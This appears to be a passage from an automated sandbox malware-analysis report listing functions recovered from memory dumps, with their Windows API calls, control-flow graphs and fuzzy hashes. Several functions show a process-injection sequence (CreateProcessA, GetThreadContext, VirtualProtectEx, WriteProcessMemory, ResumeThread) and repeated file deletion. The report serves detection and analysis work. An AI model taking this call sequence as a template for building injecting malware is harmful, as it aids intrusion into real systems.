                                                                                                                                                                  • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                  • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                  • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                  • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                  • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1099281029-0
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A3409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 511 22a3409-22a3462 GetVolumeInformationA call 22a3634
                                                                                                                                                                APIs
                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(022A3405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 022A3409
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                                                • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction ID: 175a78ab8dedf140103e6ebc39a8db2d7994838a56987a0e1431682536ce1ac2
                                                                                                                                                                • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                • Instruction Fuzzy Hash: 75F0FE75500154DBEF02EF24C485A9A77F8AF44344F4504C8AA4DBF206CA309555CFA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 022A2951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(022A2949,00000008,?,00000000,022A2835,00000000), ref: 022A2956
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 022A2993
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A29C1), ref: 022A29D0
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A29F8), ref: 022A2A07
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 8cf38ce699ad67073cb319f5fb9e307f4ad5268875acf3c64b95e5b257230b88
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: 43518471414314DFDB22AFB08D58FEB77BDFF40704F4405A5AE45EA459EA349680CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C292D Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 554 1c292d-1c2943 call 1c3653 LoadLibraryA call 1c0c9c 558 1c2948-1c295f 554->558 560 1c2961-1c2977 VirtualAlloc 558->560 560->560 561 1c2979-1c299f call 1c25e8 call 1c29a6 560->561 566 1c2a07-1c2a1a call 1c3653 lstrcat 561->566 567 1c29a1-1c2a06 call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 561->567 575 1c2a20-1c2a43 call 1c2b4d call 1c34f7 566->575 567->566 582 1c2a48-1c2a4f 575->582 582->575 584 1c2a51-1c2a6d call 1c343f call 1c2683 582->584 594 1c2a6f 584->594 595 1c2a9a-1c2ab1 call 1c2683 584->595 594->595 596 1c2a71-1c2a86 call 1c26f9 594->596 601 1c2ade-1c2af5 call 1c2683 595->601 602 1c2ab3 595->602 596->595 605 1c2a88 596->605 610 1c2af8-1c2b11 call 1c2e97 601->610 611 1c2af7 601->611 602->601 603 1c2ab5-1c2aca call 1c26f9 602->603 603->601 612 1c2acc 603->612 605->595 608 1c2a8a-1c2a94 DeleteFileA 605->608 608->595 616 1c2b34-1c2b48 Sleep 610->616 617 1c2b13-1c2b1c call 1c3057 610->617 611->610 612->601 614 1c2ace-1c2ad8 DeleteFileA 612->614 614->601 616->582 617->616 620 1c2b1e-1c2b2e DeleteFileA 617->620 620->616
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 675344582-0
                                                                                                                                                                • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A09FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 703 22a09fd-22a0a0c call 22a3677 CreateProcessA 706 22a0a12-22a0a34 GetThreadContext 703->706 707 22a0b10 703->707 706->707 708 22a0a3a-22a0a5f VirtualProtectEx 706->708 709 22a0b15-22a0b16 707->709 710 22a0b10 call 22a0b17 707->710 708->707 711 22a0a65-22a0aa4 DuplicateHandle 708->711 710->709 711->707 712 22a0aa6-22a0ad2 WriteProcessMemory 711->712 712->707 713 22a0ad4-22a0ae0 ResumeThread 712->713 714 22a0ae5-22a0b09 Sleep OpenMutexA 713->714 714->709 715 22a0b0b-22a0b0e 714->715 715->707 715->714
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,022A09F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 022A0A04
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 022A0A2C
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 022A0A57
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,022A5834,00000000,00000000,00000002), ref: 022A0A9C
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 022A0ACA
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 022A0ADA
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 022A0AEA
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022A0B01
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: 48795f94e43628ffb5d551bb58cc6523b4bd5c9d9d5eb839d6cfc1ea5a8520f5
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: 403184316502159FEF229F50CC94FA977B8FF04748F0805D4AA49FE0E9DBB09A94CE64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 696 1c0af1-1c0af2 692->696 693->692 695 1c0a16-1c0a3b VirtualProtectEx 693->695 695->692 697 1c0a3c-1c0a80 DuplicateHandle 695->697 697->692 699 1c0a82-1c0aae WriteProcessMemory 697->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->696 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 617592159-0
                                                                                                                                                                • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A29CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A29C1), ref: 022A29D0
                                                                                                                                                                  • Part of subcall function 022A2A01: lstrcat.KERNEL32(00000000,022A29F8), ref: 022A2A07
                                                                                                                                                                  • Part of subcall function 022A2A01: lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
                                                                                                                                                                  • Part of subcall function 022A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
                                                                                                                                                                  • Part of subcall function 022A2A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: 3291caf38847fe9322c1b3f46360ee6ebac4fdef4d46ed08a74f455664abee49
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: B3415471414314DFDB22AFB08D58FAB73BDFF40704F404A95AE86EA459DA349684CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 745 1c2a71-1c2a86 call 1c26f9 743->745 750 1c2ade-1c2af5 call 1c2683 744->750 751 1c2ab3 744->751 745->744 754 1c2a88 745->754 759 1c2af8-1c2b11 call 1c2e97 750->759 760 1c2af7 750->760 751->750 752 1c2ab5-1c2aca call 1c26f9 751->752 752->750 761 1c2acc 752->761 754->744 757 1c2a8a-1c2a94 DeleteFileA 754->757 757->744 765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->750 763 1c2ace-1c2ad8 DeleteFileA 761->763 763->750 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                  • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                  • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A2A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 871 22a2a01-22a2a3e call 22a3677 lstrcat call 22a2525 call 22a2a38 call 22a3677 lstrcat 881 22a2a44-22a2a67 call 22a2b71 call 22a351b 871->881 885 22a2a6c-22a2a73 881->885 885->881 886 22a2a75-22a2a91 call 22a3463 call 22a26a7 885->886 891 22a2abe-22a2ad5 call 22a26a7 886->891 892 22a2a93 886->892 898 22a2b02-22a2b19 call 22a26a7 891->898 899 22a2ad7 891->899 892->891 894 22a2a95-22a2aaa call 22a271d 892->894 894->891 900 22a2aac 894->900 907 22a2b1b 898->907 908 22a2b1c-22a2b35 call 22a2ebb 898->908 899->898 901 22a2ad9-22a2aee call 22a271d 899->901 900->891 903 22a2aae-22a2ab8 DeleteFileA 900->903 901->898 910 22a2af0 901->910 903->891 907->908 913 22a2b58-22a2b6c Sleep 908->913 914 22a2b37-22a2b40 call 22a307b 908->914 910->898 912 22a2af2-22a2afc DeleteFileA 910->912 912->898 913->885 914->913 917 22a2b42-22a2b52 DeleteFileA 914->917 917->913
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A29F8), ref: 022A2A07
                                                                                                                                                                  • Part of subcall function 022A2A38: lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
                                                                                                                                                                  • Part of subcall function 022A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
                                                                                                                                                                  • Part of subcall function 022A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
                                                                                                                                                                  • Part of subcall function 022A2A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
                                                                                                                                                                  • Part of subcall function 022A2A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4261675396-0
                                                                                                                                                                • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction ID: a2bd5812f36a82a48b988da4e90203f538b131e9fd35990a7a358e2349ea9ca9
                                                                                                                                                                • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction Fuzzy Hash: 0E414471411318DFDB22AFB08D58FAF77BDFF40704F4049A5AE86EA459DA349684CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
